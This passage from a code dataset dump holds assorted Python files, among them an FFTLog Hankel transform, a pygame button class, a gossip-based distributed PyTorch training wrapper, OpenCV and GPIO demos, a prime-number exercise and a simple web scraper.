pf=4*pi*np.sqrt(pi/2.),q=0):\n\t\n\t# module to calculate Hankel Transform\n\t# \\int_0^\\infty dr k A(r) J_mu(kr), via fftlog algorithm\n\t# Common application is for correlation function:\n\t# P(k)= 2 pi \\int dr r^2 \\sin(kr)/kr xi(r) \n\t# in which case \n\t# alpha_k=-1.5\n\t# beta_r=1.5\n\t# mu=.5 \n\t# pf=4 pi *sqrt(pi/2)\n\t\n\tf_r=r**beta_r*f_r\n\tk, A=fft_log(r,f_r,q,mu)\n\t\n\tf_k=pf*A*k**alpha_k \n\treturn k, f_k","repo_name":"JoeMcEwen/FAST-PT","sub_path":"fastpt/HT.py","file_name":"HT.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"}
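A usage sketch for the wrappers above, on a toy spectrum sampled evenly in log k, with a direct-quadrature spot check (assumes this file is importable as `HT`, a hypothetical import name; the even-log-spacing requirement is enforced inside `fft_log`):

```python
import numpy as np
import HT  # hypothetical import name for the module above

# log-spaced grid, as fft_log requires
k = np.logspace(-3, 2, 1024)
P_k = np.exp(-0.5 * np.log(k) ** 2)  # toy power spectrum, chosen only for its smooth shape

# P(k) -> xi(r) with the default mu=0.5 (spherical Bessel j_0) settings
r, xi = HT.k_to_r(k, P_k)

# spot-check one r value against direct quadrature of the same integral
i = len(r) // 2
direct = np.trapz(k**2 / (2 * np.pi**2) * np.sin(k * r[i]) / (k * r[i]) * P_k, k)
print(xi[i], direct)  # should agree well away from the grid edges
```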
+{"seq_id":"35970972562","text":"import pygame\nimport sys\n\n\nclass Button(pygame.sprite.Sprite):\n\n    def __init__(self, click_dir, img_dir, x, y, color=pygame.Color(\"navy\")):\n        \"\"\"Basic class for buttons.\"\"\"\n        super().__init__()\n        self.dir = img_dir\n        self.img = pygame.image.load(self.dir).convert_alpha()\n        self.image = self.img\n        clickedimg = pygame.image.load(click_dir).convert_alpha()\n        self.clickedimg = clickedimg\n        self.rect = self.image.get_rect()\n        self.rect.topleft = (x, y)\n        self.click = pygame.mixer.Sound('./sounds/click.wav')\n\n    def hover(self):\n        \"\"\"Changes the sprite's image to the hovered image\"\"\"\n        self.image = self.clickedimg\n    \n    def unhover(self):\n        \"\"\"Changes the sprite's image back to the default image\"\"\"\n        self.image = self.img\n    \n    def check_mouse(self, pos_tuple):\n        \"\"\" Checks if the mouse position (pos_tuple) is within the bounds of a button's borders.\n        If mouse within bounds, returns True.\"\"\"\n        #Tuple of range of x covered by sprite rect\n        mouse_x = pos_tuple[0]\n        mouse_y = pos_tuple[1]\n        x_range = (self.rect.topleft[0], self.rect.topleft[0] + self.img.get_width())\n        y_range = (self.rect.topleft[1], self.rect.topleft[1] + self.img.get_height())\n        if (mouse_x <= x_range[1]) and (mouse_x >= x_range[0]):\n            if (mouse_y <= y_range[1]) and (mouse_y >= y_range[0]):\n                return True\n    \n    def click_sound(self):\n        \"\"\"Plays click sound when button is clicked.\"\"\"\n        pygame.mixer.Sound.play(self.click)\n","repo_name":"petervanderhook/pyong","sub_path":"models/button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38944797082","text":"import scipy.stats as st\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndistribution0 = \"alpha\"\nparams0 = [0.1764, 0.0748, 0.2752]\ndistribution1 = \"johnsonsu\"\nparams1 = [-1.0438, 0.8206, 0.2698, 0.0661]\ndistribution2 = \"johnsonsb\"\nparams2 = [1.1338, 0.5656, 0.2592, 5.0864]\n\n\ndef plot(distribution, params):\n    dist = getattr(st, distribution)\n\n    loc = params[-2]\n    scale = params[-1]\n    arg = params[:-2]\n    start = dist.ppf(0.01, *arg, loc=loc, scale=scale)\n    end1 = dist.ppf(0.99, *arg, loc=loc, scale=scale)\n    x = np.linspace(start, end1, 1000)\n    y = dist.pdf(x, loc=loc, scale=scale, *arg)\n\n    plt.clf()\n    plt.plot(x, y, 'b', label=distribution)\n    plt.savefig(distribution + \".pdf\", bbox_inches='tight')\n\n\nplot(distribution0, params0)\nplot(distribution1, params1)\nplot(distribution2, params2)\n","repo_name":"Daples/mathematical-engineering","sub_path":"5th-semester/modelling-and-simulation-5/discrete-simulation/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"48334279743","text":"import functools\nimport time\nimport sys\nimport threading\n\nimport torch\nimport torch.distributed as dist\nfrom torch.cuda.comm import broadcast_coalesced, reduce_add_coalesced\nfrom torch.autograd import Variable\nfrom torch.nn.modules import Module\nfrom torch.nn.parallel.replicate import replicate\nfrom torch.nn.parallel.scatter_gather import scatter_kwargs, gather\nfrom torch.nn.parallel.parallel_apply import parallel_apply\n\nfrom .gossiper import PushSum, PushPull\nfrom .graph_manager import NPeerDynamicDirectedExponentialGraph as NPDDEGraph\nfrom .mixing_manager import UniformMixing\nfrom .utils import (\n    create_process_group, communicate, flatten_tensors,\n    group_by_dtype, make_logger, unflatten_tensors)\n\nHEARTBEAT_TIMEOUT = 300  # maximum time to wait for message (seconds)\n\n\nclass GossipDataParallel(Module):\n    \"\"\" Distributed Gossip model wrapper \"\"\"\n\n    def __init__(self, module, device_ids=None, rank=None, world_size=None,\n                 graph=None, mixing=None, comm_device=None, push_sum=True,\n                 overlap=False, synch_freq=0, verbose=False, use_streams=True,\n                 nprocs_per_node=1, local_node_group=None):\n        super(GossipDataParallel, self).__init__()\n\n        # devices available locally\n        if device_ids is None:\n            device_ids = list(range(torch.cuda.device_count()))\n        self.output_device = device_ids[0]\n        self.device_ids = device_ids\n\n        self.nprocs_per_node = 
nprocs_per_node\n\n if world_size is None or rank is None:\n assert dist.is_initialized()\n rank = dist.get_rank()\n world_size = dist.get_world_size()\n self.process_rank = rank\n\n if self.nprocs_per_node > 1:\n self.local_rank = self.process_rank % self.nprocs_per_node\n world_size //= nprocs_per_node\n rank //= nprocs_per_node\n if local_node_group is None:\n for node in range(world_size):\n node_processes_ranks = list(\n range(node * self.nprocs_per_node,\n (node + 1) * self.nprocs_per_node))\n # Process group to communicate between processes on this\n # machine\n new_local_group = create_process_group(\n node_processes_ranks)\n if self.process_rank in node_processes_ranks:\n self.local_node_group = new_local_group\n else:\n self.local_node_group = local_node_group\n else:\n self.local_rank = 0\n\n # put model on output device\n self.module = module\n first_param_dtype = next(self.module.parameters()).dtype\n\n # prepare local intra-node all-reduce objects\n if len(self.device_ids) > 1:\n self.broadcast_bucket_size = 10 * 1024 * 1024 # bytes\n self.nccl_reduce_bucket_size = 256 * 1024 * 1024 # bytes\n\n self._module_copies = replicate(self.module, self.device_ids,\n detach=True)\n self._module_copies[0] = self.module\n for cmodule in self._module_copies[1:]:\n for p, cp in zip(self.module.parameters(),\n cmodule.parameters()):\n cp.requires_grad = p.requires_grad\n else:\n self._module_copies = [self.module]\n\n # choose communication device based on backend\n if comm_device is None:\n cpu_comm = True if dist.get_backend() == 'gloo' else False\n comm_device = torch.device('cpu') if cpu_comm else torch.device('cuda')\n self.__cpu_comm = comm_device.type == 'cpu'\n\n if graph is None:\n graph = NPDDEGraph(\n rank, world_size, self.nprocs_per_node, self.local_rank)\n\n if mixing is None:\n mixing = UniformMixing(graph, comm_device)\n\n # distributed backend config\n self.dist_config = {\n 'verbose': verbose,\n 'comm_device': comm_device,\n 'graph': graph,\n 'mixing': mixing,\n 'push_sum': push_sum,\n 'rank': rank,\n 'process_rank': self.process_rank,\n 'world_size': world_size,\n 'cpu_comm': self.__cpu_comm\n }\n self.overlap = overlap\n self.synch_freq = synch_freq\n self.num_updates = 0\n self.asynch = synch_freq > 0\n\n # logger used to print to stdout\n self.logger = make_logger(rank, verbose)\n\n # push-sum weight=1.0 ==> distributed averaging\n self.ps_weight = torch.ones(1, device=comm_device).type(\n first_param_dtype)\n self.nprocs_per_node_device = torch.tensor(\n [self.nprocs_per_node], device=comm_device,\n dtype=first_param_dtype)\n self.is_ps_numerator = False\n\n # prepare parameters for gossip\n self.gossip_enable = True\n self.gossiping = False\n self.params_mixed = True\n self.gossip_ps_factor = torch.zeros(1, device=comm_device).type(\n first_param_dtype)\n self.gossip_ps_weight = self.ps_weight.clone()\n self.gossip_params = []\n self.gossip_device_buffer = []\n for p in module.parameters():\n cp = p.clone().detach_()\n cp = cp.cpu().pin_memory() if self.__cpu_comm else cp.cuda()\n self.gossip_params.append(cp)\n self.gossip_device_buffer.append(cp)\n\n # prepare gossip process control objects\n self.gossip_lock = threading.Lock()\n self.gossip_flag = threading.Event()\n self.train_flag = threading.Event()\n\n if self.dist_config['comm_device'].type != 'cpu' and use_streams:\n self.gossip_stream = torch.cuda.Stream()\n else:\n self.gossip_stream = torch.cuda.current_stream()\n\n if self.process_rank % self.nprocs_per_node == 0:\n self.gossip_thread = 
threading.Thread(\n target=GossipDataParallel._gossip_target,\n args=(self.dist_config,\n self.gossip_flag,\n self.train_flag,\n self.gossip_lock,\n self.gossip_params,\n self.gossip_device_buffer,\n self.gossip_ps_weight,\n self.gossip_ps_factor,\n self.gossip_stream))\n self.gossip_thread.daemon = True\n self.gossip_thread.name = 'Gossip-Thread'\n self.gossip_thread.start()\n else:\n self.gossip_flag.set()\n # wait for thread to complete initialization\n self.gossip_flag.wait()\n self.gossip_flag.clear()\n # lazy mixing avoids additional bias/de-bias steps\n self.lazy_mixing = (\n not self.asynch and self.dist_config['mixing'].is_regular() and\n not self.overlap)\n self.lazy_ps_factor = self.gossip_ps_factor.clone()\n self.logger.debug('lazy mixing: {}'.format(self.lazy_mixing))\n\n # register ps/grad-reduction hooks\n self.__register_hooks()\n\n def update_gossiper(self, attr, val):\n self.logger.debug('waiting for gossip lock')\n with self.gossip_lock:\n self.logger.debug('gossip lock received')\n for gossiper in self.dist_config['gossipers'].values():\n if val == getattr(gossiper, attr):\n self.logger.debug('nothing to update')\n return\n # update attr\n self.logger.debug('setting gossiper {} to {}'.format(attr, val))\n setattr(gossiper, attr, val)\n\n def state_dict(self, finish_gossip=True):\n # If user is saving the model, complete the gossip to avoid losing\n # the information which has been sent by a peer. If _query_gossip_queue\n # is not called here, it would only be called in the next\n # pre_forward_hook and information sent by the peer will be lost\n # if the checkpoint is restored\n if finish_gossip:\n self._query_gossip_queue()\n\n super_dict = super(GossipDataParallel, self).state_dict()\n supplanted_dict = {'state_dict': super_dict,\n 'ps_weight': self.ps_weight.cpu(),\n 'is_ps_numerator': self.is_ps_numerator}\n return supplanted_dict\n\n def load_state_dict(self, load_dict):\n state_dict = load_dict['state_dict']\n super(GossipDataParallel, self).load_state_dict(state_dict)\n self.ps_weight = load_dict['ps_weight'].to(\n device=self.dist_config['comm_device'])\n self.is_ps_numerator = load_dict['is_ps_numerator']\n\n def forward(self, *inputs, **kwargs):\n \"\"\" Forward pass performed in parallel across all devices on node \"\"\"\n # scatter inputs onto devices\n inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)\n if self.nprocs_per_node > 1:\n self._sync_params_multiprocess()\n if len(self.device_ids) > 1:\n # run forward pass across all devices\n self._sync_params()\n outputs = self.parallel_apply(self._module_copies[:len(inputs)],\n inputs, kwargs)\n return self.gather(outputs, self.output_device)\n else:\n return self.module(*inputs[0], **kwargs[0])\n\n def scatter(self, inputs, kwargs, device_ids):\n return scatter_kwargs(inputs, kwargs, device_ids, dim=0)\n\n def parallel_apply(self, replicas, inputs, kwargs):\n return parallel_apply(replicas, inputs, kwargs,\n self.device_ids[:len(replicas)])\n\n def gather(self, outputs, output_device):\n return gather(outputs, output_device, dim=0)\n\n def _sync_params(self):\n \"\"\" Synchronize parameters across devices (intra-node) \"\"\"\n if len(self.device_ids) <= 1:\n return\n\n # intra-node parameter sync\n params = [p.data for p in self.module.parameters()]\n result = broadcast_coalesced(params, self.device_ids,\n self.broadcast_bucket_size)\n for tensors, module in zip(result[1:], self._module_copies[1:]):\n for tensor, param in zip(tensors, module.parameters()):\n param.data.set_(tensor)\n\n # 
intra-node buffer sync\n        buffers = [b.data for b in self.module.buffers()]\n        if len(buffers) > 0:\n            result = broadcast_coalesced(buffers, self.device_ids,\n                                         self.broadcast_bucket_size)\n            for tensors, module in zip(result[1:], self._module_copies[1:]):\n                for tensor, buf in zip(tensors, module.buffers()):\n                    buf.data.set_(tensor)\n\n    def _sync_params_multiprocess(self):\n        \"\"\" Synchronize parameters across devices (intra-node) \"\"\"\n        # intra-node parameter sync\n        params = [p.data for p in self.module.parameters()]\n        communication_op = functools.partial(\n            dist.broadcast,\n            src=(self.dist_config['rank'] * self.nprocs_per_node),\n            group=self.local_node_group)\n        communicate(params, communication_op)\n\n        # intra-node buffer sync\n        buffers = [b.data for b in self.module.buffers()]\n        if len(buffers) > 0:\n            communication_op = functools.partial(\n                dist.broadcast,\n                src=(self.dist_config['rank'] * self.nprocs_per_node),\n                group=self.local_node_group)\n            communicate(buffers, communication_op)\n\n    def ps_numerator(self):\n        \"\"\" Convert model params to ps-numerator \"\"\"\n        if not self.is_ps_numerator:\n            ps_weight = self.ps_weight\n            if not self.lazy_mixing:\n                for p in self.module.parameters():\n                    p.data.mul_(ps_weight.type(p.data.dtype))\n        self.is_ps_numerator = True\n\n    def unbias(self):\n        \"\"\" Convert model params to de-biased estimate \"\"\"\n        if self.is_ps_numerator:\n            ps_weight = self.ps_weight\n            if not self.lazy_mixing:\n                for p in self.module.parameters():\n                    p.data.div_(ps_weight.type(p.data.dtype))\n        self.is_ps_numerator = False\n\n    def train(self, mode=True):\n        super(GossipDataParallel, self).train(mode)\n        self.gossip_enable = True\n        for module in self._module_copies[1:]:\n            module.train(mode)\n\n    def eval(self):\n        super(GossipDataParallel, self).eval()\n        self.gossip_enable = False\n        for module in self._module_copies[1:]:\n            module.eval()\n        self._query_gossip_queue(non_blocking=self.asynch)\n\n    def block(self):\n        self.logger.info('blocking')\n        dist.barrier()\n\n    def sync_comms(self):\n        self._query_gossip_queue(non_blocking=False)\n\n    def _query_gossip_queue(self, non_blocking=False):\n        \"\"\" Check gossip-queue for push-sum residuals and update model \"\"\"\n        if not self.gossip_enable:\n            return\n\n        self.logger.debug('querying gossip queue')\n\n        # no gossip happening right now so just return\n        if not self.gossiping:\n            if self.process_rank % self.nprocs_per_node == 0:\n                self.logger.warning('not gossiping right now')\n            return False\n\n        if not non_blocking:\n            if not self.gossip_flag.wait(timeout=HEARTBEAT_TIMEOUT):\n                raise NameError('Gossip flag timeout')\n                sys.exit()  # HEARTBEAT monitor\n\n        # query gossip thread\n        if self.gossip_flag.is_set():\n            self.logger.debug('received gossip flag')\n\n            # atomic gossip was interrupted so try again\n            if self.gossip_ps_weight[0] == -1:\n                self.gossip_flag.clear()\n                self.params_mixed = True\n                self.gossiping = False\n                self.transfer_params(mix=False)\n                return False\n\n            self.lazy_ps_factor.copy_(self.gossip_ps_factor)\n\n            # convert model-params to ps numerators b4 adding residuals\n            self.ps_numerator()\n\n            # add residuals\n            self.ps_weight += self.gossip_ps_weight\n            if self.lazy_mixing:\n                self.ps_weight *= self.lazy_ps_factor\n            for p, r in zip(self.module.parameters(),\n                            self.gossip_device_buffer):\n                p.data.add_(r)\n                if self.lazy_mixing:\n                    p.data.mul_(self.lazy_ps_factor.type(p.data.dtype))\n\n            # update flags\n            self.logger.debug('updated ps-weight {}'.format(self.ps_weight))\n            self.logger.debug('updated model 
params')\n            self.gossip_flag.clear()\n            self.params_mixed = True\n            self.gossiping = False\n            return True\n\n    def transfer_params(self, mix=True):\n        \"\"\" Transfers COPY of model parameters to gossip queue \"\"\"\n        if (not self.gossip_enable or\n                self.process_rank % self.nprocs_per_node != 0):\n            return False\n\n        self.logger.debug('transferring model params')\n\n        # don't transfer new params if old params haven't been mixed yet\n        if not self.params_mixed:\n            self.logger.warning('params not mixed')\n            return False\n\n        # using lazy mixing ==> mix on query not transfer\n        mix = mix and not self.lazy_mixing\n\n        # Transfer ps-numerators to gossip-process:\n        # --\n        self.ps_numerator()\n        if mix:\n            self.ps_weight *= self.gossip_ps_factor\n        self.gossip_ps_weight.copy_(self.ps_weight)\n        # --\n        # params gpu-gpu copy (fast)\n        # --\n        for p, gossip_device_buffer_elem in zip(\n                self.module.parameters(), self.gossip_device_buffer):\n            if mix:\n                p.data.mul_(self.gossip_ps_factor.type(p.data.dtype))\n            gossip_device_buffer_elem.data.copy_(p)\n        # --\n        # buffer to gossip-thread copy (potentially slow, but asynchronous)\n        # --\n        self.gossip_stream.wait_stream(torch.cuda.current_stream())\n        with torch.cuda.stream(self.gossip_stream):\n            for b, gp in zip(self.gossip_device_buffer, self.gossip_params):\n                gp.copy_(b, non_blocking=True)\n\n        # --\n\n        # update flags\n        self.logger.debug('transferred model params')\n        self.params_mixed = False\n        self.gossiping = True\n        self.train_flag.set()\n        return True\n\n    @staticmethod\n    def _gossip_into_receive_buffer(send_buffer, gossiper, receive_buffer,\n                                    gossip_ps_weight, gossip_lock,\n                                    dist_config):\n        # flatten parameters before sending\n        out_msg = flatten_tensors(send_buffer)\n\n        # send and receive parameters\n        with gossip_lock:\n            in_msg, ps_weight = gossiper.mix(out_msg, gossip_ps_weight,\n                                             residual=True)\n            ps_factor = gossiper.mixing_weights['lo']\n\n        # unflatten parameters\n        for r, g in zip(unflatten_tensors(in_msg, send_buffer),\n                        receive_buffer):\n            if dist_config['cpu_comm']:\n                g.copy_(r, non_blocking=True)\n            else:\n                g.data.copy_(r)\n\n        return ps_weight, ps_factor\n\n    @staticmethod\n    def _gossip_target(dist_config, gossip_flag, train_flag, gossip_lock,\n                       gossip_params, gossip_device_buffer,\n                       gossip_ps_weight, gossip_ps_factor, gossip_stream):\n        \"\"\" Gossip thread, which performs push-sum on model params \"\"\"\n        logger = make_logger(dist_config['rank'], dist_config['verbose'])\n\n        gossip_params_by_dtype = group_by_dtype(gossip_params)\n        gossip_device_buffer_by_dtype = group_by_dtype(gossip_device_buffer)\n\n        gossipers = {}\n        # init gossip instance\n        gossiper_class = PushSum if dist_config['push_sum'] else PushPull\n        for dtype in gossip_params_by_dtype:\n            gossipers[dtype] = gossiper_class(\n                flatten_tensors(gossip_params_by_dtype[dtype]),\n                device=dist_config['comm_device'],\n                graph=dist_config['graph'],\n                mixing=dist_config['mixing'],\n                rank=dist_config['process_rank'],\n                world_size=dist_config['world_size'],\n                logger=logger)\n\n        dist_config['gossipers'] = gossipers\n        gossip_ps_factor.data.copy_(\n            gossipers[list(gossipers)[0]].mixing_weights['lo'])\n        gossip_flag.set()\n\n        # gossip loop\n        while True:\n            train_flag.wait()\n            logger.debug('received train-flag')\n            try:\n                with torch.cuda.stream(gossip_stream):\n                    for dtype in gossip_params_by_dtype:\n                        ps_weight, ps_factor = GossipDataParallel._gossip_into_receive_buffer(\n                            gossip_params_by_dtype[dtype], gossipers[dtype],\n                            gossip_device_buffer_by_dtype[dtype],\n                            gossip_ps_weight, gossip_lock, dist_config)\n                        
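# In-place copy_ publishes the freshly mixed scalars through the shared\n                        # tensors, so the training thread reads them without reallocation.\n                        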
gossip_ps_weight.copy_(ps_weight)\n gossip_ps_factor.copy_(ps_factor)\n except RuntimeError as e:\n logger.warning('received runtime error {}'.format(e))\n for gossiper in gossipers.values():\n gossiper.clean_msg_buffers_()\n gossip_ps_weight.fill_(-1)\n finally:\n # Make sure all queued operations are complete\n gossip_stream.synchronize()\n # give main thread go-ahead to read our gossip buffer\n train_flag.clear()\n gossip_flag.set()\n\n def __register_hooks(self):\n \"\"\"\n Registers push-sum de-bias/bias hooks in pre-forward/post-backward\n passes in all leaf modules\n \"\"\"\n self.register_forward_pre_hook(self.__make_forward_pre_hook())\n self.register_backward_hook(self.__make_backward_hook())\n\n def __make_backward_hook(self):\n self.logger.debug('making backward hook')\n\n def hook(*unused):\n # reduce gradients across devices on a single machine\n if len(self.device_ids) > 1:\n\n # collect gradients from all copies\n all_grads = [[] for _ in range(len(self._module_copies))]\n for dev_idx, module in enumerate(self._module_copies):\n for p in module.parameters():\n if not p.requires_grad or p.grad is None:\n continue\n all_grads[dev_idx].append(p.grad.data)\n\n # reduce grads\n reduced_grads = reduce_add_coalesced(\n all_grads, self.output_device,\n self.nccl_reduce_bucket_size)\n\n # update grads with reduced grads\n for grad, reduced in zip(all_grads[0], reduced_grads):\n grad.copy_(reduced)\n\n # clear the gradients and parameters across all replicas\n for module in self._module_copies[1:]:\n for param in module.parameters():\n if param.requires_grad:\n param.grad = None\n param.data.set_()\n\n if self.nprocs_per_node > 1:\n grads = []\n for p in self.module.parameters():\n if not p.requires_grad or p.grad is None:\n continue\n p.grad.data.div_(self.nprocs_per_node_device.type(\n p.grad.data.dtype))\n grads.append(p.grad.data)\n\n communication_op = functools.partial(\n dist.all_reduce, group=self.local_node_group)\n communicate(grads, communication_op)\n\n # convert model back to ps-numerator\n self.ps_numerator()\n\n def queue_hook(*unused):\n Variable._execution_engine.queue_callback(hook)\n return queue_hook\n\n def __make_forward_pre_hook(self):\n self.logger.debug('making forward pre-hook')\n\n def hook(*unused):\n \"\"\" Query gossip queue and de-bias during forward pass \"\"\"\n # gossip during training (not inference)\n if self.gossip_enable:\n non_blocking = self.num_updates < self.synch_freq\n if self._query_gossip_queue(non_blocking):\n self.num_updates = 0\n else:\n self.num_updates += 1\n if self.overlap:\n self.transfer_params()\n\n # convert model to de-biased estimate\n self.unbias()\n\n return hook\n","repo_name":"facebookresearch/stochastic_gradient_push","sub_path":"gossip/distributed.py","file_name":"distributed.py","file_ext":"py","file_size_in_byte":22947,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"22041961568","text":"import os\nfrom celery import Celery\nfrom celery.schedules import crontab\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'volunteer.settings')\n\napp = Celery('volunteer')\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n 'send': {\n 'task': 'PersonalArea.tasks.send',\n 'schedule': crontab(minute='*/1'),\n 
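# crontab(minute='*/1') matches every minute, so beat enqueues\n        # PersonalArea.tasks.send once per minute.\n        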
}\n}","repo_name":"gepolis/Ebook3","sub_path":"volunteer/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27403473244","text":"from beforeWords import cantidad_05, fechaEmision_12, fechaEntrega_13, marca_17\nfrom onlyFirst import lote_03, caducidad_04, fechaFabr_14, paisOrigen_16, noElementos\nfrom last import noRemision_01, codigoProd_02, noOrdRep_06, noContrato_07, destino_18, licitacion_19, entidadFed_20\nfrom itertools import repeat\nimport pandas as pd\nimport datetime\n\n\nnoRemision_01 = [element for element, num in zip(noRemision_01, noElementos) for _ in repeat(None, num)]\ncodigoProd_02 = [element for element, num in zip(codigoProd_02, noElementos) for _ in repeat(None, num)]\nnoOrdRep_06 = [element for element, num in zip(noOrdRep_06, noElementos) for _ in repeat(None, num)]\nnoContrato_07 = [element for element, num in zip(noContrato_07, noElementos) for _ in repeat(None, num)]\nfechaEmision_12 = [element for element, num in zip(fechaEmision_12, noElementos) for _ in repeat(None, num)]\nfechaEntrega_13 = [element for element, num in zip(fechaEntrega_13, noElementos) for _ in repeat(None, num)]\ndestino_18 = [element for element, num in zip(destino_18, noElementos) for _ in repeat(None, num)]\nlicitacion_19 = [element for element, num in zip(licitacion_19, noElementos) for _ in repeat(None, num)]\nentidadFed_20 = [element for element, num in zip(entidadFed_20, noElementos) for _ in repeat(None, num)]\n\nvacio = [''] * len(noRemision_01)\n\ndf = pd.DataFrame({'Remision': noRemision_01, \n 'Código de Producto': codigoProd_02, \n 'Lote': lote_03, \n 'Caducidad': caducidad_04, \n 'Cantidad': cantidad_05, \n 'No. Orden de Reposicion': noOrdRep_06, \n 'No. 
Contrato': noContrato_07, \n                   'Proveedor': vacio,\n                   'Precio de Compra': vacio,\n                   'IVA': vacio,\n                   'Tipo de Moneda': vacio,\n                   'Fecha de emision': fechaEmision_12, \n                   'Fecha máxima de entrega': fechaEntrega_13, \n                   'Fecha de Fabricación': fechaFabr_14, \n                   'Registro Sanitario': vacio,\n                   'País de Origen' : paisOrigen_16, \n                   'Marca': marca_17, \n                   'Destino': destino_18, \n                   'Licitación': licitacion_19, \n                   'Entidad Federativa': entidadFed_20})\n\nfecha = datetime.datetime.now().strftime(\"%Y-%m-%d\")\ndf.to_excel(f'output {fecha}.xlsx', index=False)\n\n\n\n\n\n","repo_name":"rojasfuentes/parserGobierno","sub_path":"Scripts/toParser.py","file_name":"toParser.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30638709227","text":"# Baekjoon step-by-step problems, step 9 - prime numbers\n# https://www.acmicpc.net/problem/2581\n\n# m = int(input())\n# n = int(input())\n# case = []\n\n# for i in range(m, n + 1):\n#     yaksoo = 0\n#     for j in range(1, i + 1):\n#         if i % j == 0: \n#             yaksoo += 1\n#             if yaksoo > 2: # To avoid exceeding the time limit.\n#                 break\n#     if yaksoo == 2: \n#         case.append(i)\n\n# if len(case) > 0:\n#     print(sum(case))\n#     print(min(case))\n# else:\n#     print(-1)\n\n#############################\n\ndef YaksooList(start, end):\n    case = []\n    for i in range(start, end + 1):\n        yaksoo = 0\n        for j in range(1, i + 1):\n            if i % j == 0: \n                yaksoo += 1\n                if yaksoo > 2: # To avoid exceeding the time limit.\n                    break\n        if yaksoo == 2: \n            case.append(i)\n    return case\n\n\nm = int(input())\nn = int(input())\nresult = YaksooList(m, n)\n\nif len(result) > 0:\n    print(sum(result))\n    print(min(result))\nelse:\n    print(-1)\n\n","repo_name":"devraphy/algorithm","sub_path":"baekjoon/step9_math2/2581.py","file_name":"2581.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7966057798","text":"# BITWISE_NOT operation on images\r\n\r\nfrom cv2 import cv2\r\nimport numpy as np\r\n\r\nimg1 = cv2.imread(\"b_w.png\")\r\n\r\nimg2 = np.zeros((184, 307, 3), dtype=np.uint8)  # Creating a black image\r\nimg2 = cv2.rectangle(img2, (100,10), (200,100), (255,255,255), -1) # Making a white rectangle inside the black box\r\n\r\nbit_not = cv2.bitwise_not(img2)\r\n\r\ncv2.imshow('IMG1 Window', img1)\r\ncv2.imshow('IMG2 Window', img2)\r\n\r\n\r\ncv2.imshow('IMG2 NOT Window', bit_not) # Resultant window\r\n\r\nif cv2.waitKey(0) == 27:\r\n    cv2.destroyAllWindows()","repo_name":"vaibhavcodes/OpenCV","sub_path":"18_bitwise_not.py","file_name":"18_bitwise_not.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20516502918","text":"import time\nfrom RailSwitch import *\n\nSW1_PIN = 14\nSW2_PIN = 15\nLED_PIN = 18\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LED_PIN, GPIO.OUT)\nGPIO.output(LED_PIN, GPIO.LOW)\nsw1 = RailSwitch(SW1_PIN)\nsw2 = RailSwitch(SW2_PIN)\n\ntry:\n    while(True):\n        if (sw1.is_pushed()):\n            GPIO.output(LED_PIN, GPIO.HIGH)\n        if (sw2.is_pushed()):\n            GPIO.output(LED_PIN, GPIO.LOW)\n        time.sleep(0.1)\n\nexcept KeyboardInterrupt:\n    print(\"break\")\n    GPIO.cleanup()\n\n","repo_name":"hajimef/plarail_switch_raspi","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72463833209","text":"\r\n\r\nimport os\r\nimport requests\r\nfrom bs4 import 
BeautifulSoup\r\n\r\n\r\n\r\ndef title1():\r\n    title = soup.title.string\r\n    return title\r\n\r\ndef images(url):\r\n    images = soup.findAll('img')\r\n    for eachimage in images:\r\n        try:\r\n            imgURL = eachimage['src']\r\n            print(imgURL)\r\n            if imgURL[0:4] != 'http':\r\n                imgURL = url+imgURL\r\n                #dealing with the path\r\n            response = requests.get(imgURL)\r\n            imageName = os.path.basename(imgURL)\r\n\r\n            with open(imageName, 'wb') as outFile:\r\n                outFile.write(response.content)\r\n        except Exception as err:\r\n            print(imgURL, err)\r\n            continue\r\n\r\ndef urlsScrape():\r\n    siteLinks = set()\r\n    base = url\r\n    links = soup.findAll('a')\r\n    for each in links:\r\n        new = each.get('href')\r\n        if not new:\r\n            continue\r\n        if 'http' not in new:\r\n            new = base+new\r\n        if not base in new:\r\n            continue\r\n        if new not in siteLinks:\r\n            siteLinks.add(new)\r\n    for entry in siteLinks:\r\n        print(entry)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n    '''Main program'''\r\n    try:\r\n        url = 'website'\r\n        page = requests.get(url)  # retrieve web-page\r\n        soup = BeautifulSoup(page.text, 'html.parser')\r\n        print('\\n\\n The website we are scraping is', url)\r\n        print('\\n\\n The title of the page is', title1())\r\n        print('\\n\\n Extracting Images from website and storing them in', os.getcwd())\r\n        images(url)\r\n        print('\\n\\nHere are some urls from the website')\r\n        urlsScrape()\r\n    except Exception as err:\r\n        print(err)\r\nprint('\\n\\nScript is done')\r\n\r\n#%%\r\n","repo_name":"wildcatjesse/Projects","sub_path":"GarciaJ_Scripting-Assignment9.py","file_name":"GarciaJ_Scripting-Assignment9.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 